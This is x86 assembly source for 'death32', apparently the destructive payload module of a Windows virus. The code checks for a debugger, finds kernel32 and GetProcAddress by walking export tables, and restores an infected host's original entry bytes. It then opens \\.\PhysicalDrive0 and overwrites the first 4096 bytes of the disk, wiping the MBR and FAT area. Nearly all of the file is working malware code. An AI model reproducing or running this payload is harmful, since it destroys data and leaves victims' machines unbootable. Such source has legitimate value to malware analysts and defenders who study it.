;---8<------------------------[death32.asm]--------------------------------8<--;
;                                                                              ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;			     DEATH SUBROUTINE		      	               ;
;------------------------------------------------------------------------------;
;			          [ IN ]				       ;
;                                                                              ;
;          		    NO INPUT IN SUBROTINE                              ;
;------------------------------------------------------------------------------;
;			          [ OUT ]				       ;
;						 			       ;
;               	    NO OUTPUT IN SUBROTINE 	                       ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
death32:
						   ;   
                                                   ;  
		                                   ; 
	    	call    setup_SEH       	
		mov     esp,[esp+8]
		xor	edi,edi
		pop	dword ptr fs:[edi]
		pop	edi
;------------------------------------------------------------------------------;
		mov	eax,04ebh                  ;   - 
		jmp	$-4                        ;   
f_diz:                                             ;
                                                   ;
		cld
	       	mov 	eax,fs:[018h]              ;    
	       	mov 	eax,[eax+30h]              ; WIN API 
	     	movzx 	eax,byte ptr [eax+02]      ; IsDebuggerPresent

		test	eax,eax                    ;   , 
		jne	Exit                       ;   

		call	supa_delta                 ; 
supa_delta:	pop	ebp                        ;  
		sub	ebp,offset supa_delta      ;

		mov 	eax,[ebp + oldip]	   ;   
						   ;  
		add 	eax,[ebp + imagebase]      ;    

		push	eax                        ;    
		                                   ; 
		call	restore                    ;  
		                                   ;  19 
		pop	[ebp+ret__]		   ;   

;------------------------------------------------------------------------------;
		mov	ebx,[esp]		   ;  ebx   kernel32.dll
		xor	bx,bx                      ;  bx
		call	getproc                    ;   Kernel32.dll

		lea 	esi,[ebp+drive_a]	   ; esi =  
	
	        push    0                          ;
	        push    00000080h                  ;
	        push    3                          ;
	        push    0                          ;
	        push    00000001h OR 00000002h     ;
	        push    40000000h OR 80000000h     ;
	        push    esi                        ;
	        lea 	eax,[ebp+CreateFileAx]     ;   
	        call 	GET_API                    ;  /

		cmp 	eax,-1                     ;   ?
		je 	Close_File                 ;

		mov 	[ebp+fHnd32],eax           ;   

	        push    00000004h                  ;   /
	        push    00001000h                  ; 
	        push    1000h			   ;   
	        push    0h                         ; 
		lea	eax,[ebp+VirtualAllocx]    ;
	        call    GET_API                    ;  

		cmp 	eax,-1                     ;  , 
		je 	Close_File                 ;  

		mov	[ebp+mHnd32],eax           ;   

	        push    0                          ;
	        lea     eax,[ebp+s2R]              ;
	        push    eax                        ;
	        push    1000h                      ;
	        push    [ebp+mHnd32]               ;
	        push    [ebp+fHnd32]               ;
		lea	eax,[ebp+WriteFilex]       ;  
	        call    GET_API                    ; MBR  FAT

	        push    00004000h                  ;
	        push	1000h                      ;
	        push    [ebp+mHnd32]               ;
		lea	eax,[ebp+VirtualFreex]     ;  
		call	GET_API                    ;

Close_File:
		push 	[ebp+fHnd32]               ; 
		lea 	eax,[ebp+CloseHandlex]     ;  
		call 	GET_API                    ;
land__:
		jmp	[ebp+ret__]                ;   
						   ;  
;------------------------------------------------------------------------------;
getproc:
		push	'ZM'                       ;
		pop	edx                        ;
		cmp 	word ptr [ebx],dx	   ; ?
		je 	found_MZ		   ; !
		sub 	ebx,1000h		   ;  
		jmp 	getproc                    ;
found_MZ:				
		mov 	edx,ebx			   ;  
		mov 	edi,[ebx+3Ch]	           ;  PE 
		add 	edi,edx			   ; + kernel'a
		push	'EP'                       ;
		pop	eax                        ;
		cmp 	word ptr [edi],ax	   ;  PE  ?

		jne 	Exit			   ;   - 
		mov 	[ebp+KernelAddr],edx       ;   kernel'a
		add 	ebx,[edi+78h] 		   ;    .
		mov 	ecx,[ebx+18h] 		   ;  
		mov 	esi,[ebx+20h] 		   ;    
						   ;  
		mov 	edi,[ebx+24h] 		   ;    .
		add 	esi,edx			   ; .    
		add 	edi,edx			   ; .  .  
		cld				   ;  
Search:						   ;   GetProcAddress
		lodsd				   ;    
						   ;   
		add 	eax,edx			   ;   
		push 	ecx			   ;  - 
		push 	edi			   ;    .
		xchg 	esi,eax			   ;  esi    
						   ;  -
		lea 	edi,[ebp+GetProcAddress]   ;    
						   ;  
		mov 	ecx,GetProcSize		   ;  
		repe 	cmpsb			   ; 
		xchg 	esi,eax			   ;   esi
		pop 	edi			   ;   
						   ;  
		pop 	ecx			   ;  - .
		je 	Found			   ; !
		inc 	edi			   ;  -  
						   ; -
		inc 	edi			   ;    .
		loop 	Search                     ;
		jmp 	Exit                       ;
Found:
		xor 	eax,eax                    ;
		mov 	ax,word ptr [edi]	   ;  
		shl 	eax,2			   ;    
		mov 	esi,[ebx+1Ch]		   ;   . 
		add 	esi,edx			   ;    
						   ;  
		add 	esi,eax			   ;    -
		lodsd				   ; 
		add 	eax,edx			   ;   kernel'a
		mov 	[ebp+GetProcAddr],eax      ; 
Exit:   
		ret                                ;
;------------------------------------------------------------------------------;
GET_API:

		push 	eax			   ;     
		push 	[ebp+KernelAddr]           ;     kernel'a
		call 	[ebp+GetProcAddr]	   ;   
						   ;   
		jmp 	eax			   ;  

		ret				   ;   
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;			     SETUP SEH SUBROUTINE	      	               ;
;------------------------------------------------------------------------------;
;			          [ IN ]				       ;
;                                                                              ;
;          		    NO INPUT IN SUBROTINE                              ;
;------------------------------------------------------------------------------;
;			          [ OUT ]				       ;
;						 			       ;
;               	    NO OUTPUT IN SUBROTINE 	                       ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
setup_SEH:
		push	dword ptr fs:[0]
		mov	dword ptr fs:[0],esp
		mov	dword ptr cs:[0],0
               
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;			     RESTORE SUBROUTINE	      	                       ;
;------------------------------------------------------------------------------;
;			          [ IN ]				       ;
;                                                                              ;
;          		    NO INPUT IN SUBROTINE                              ;
;------------------------------------------------------------------------------;
;			          [ OUT ]				       ;
;						 			       ;
;               	    NO OUTPUT IN SUBROTINE 	                       ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
restore:
						   ; 
		mov	edi,eax			   ;  
		lea	esi,[ebp+s_bytes]	   ; 
		mov	ecx,19			   ;
		rep	movsb			   ;
		ret				   ;   
;------------------------------------------------------------------------------;

KernelAddr      dd      0
GetProcAddr     dd      0     
GetProcAddress	db	'GetProcAddress',0
GetProcSize	equ 	$-GetProcAddress

CreateFileAx	db	'CreateFileA',0
CloseHandlex	db	'CloseHandle',0
WriteFilex	db	'WriteFile',0
VirtualAllocx	db	'VirtualAlloc',0
VirtualFreex	db	'VirtualFree',0

fHnd32		dd	0
mHnd32		dd	0
s2r		dd	0

drive_a		db     '\\.\PhysicalDrive0',0
oldip 		dd     0h		                    
imagebase       dd     0h 
size_code	dd     0h
start_code	dd     0h
ret__		dd     0h
s_bytes		db     19 dup(0)					
;---8<------------------------[death32.asm]--------------------------------8<--;

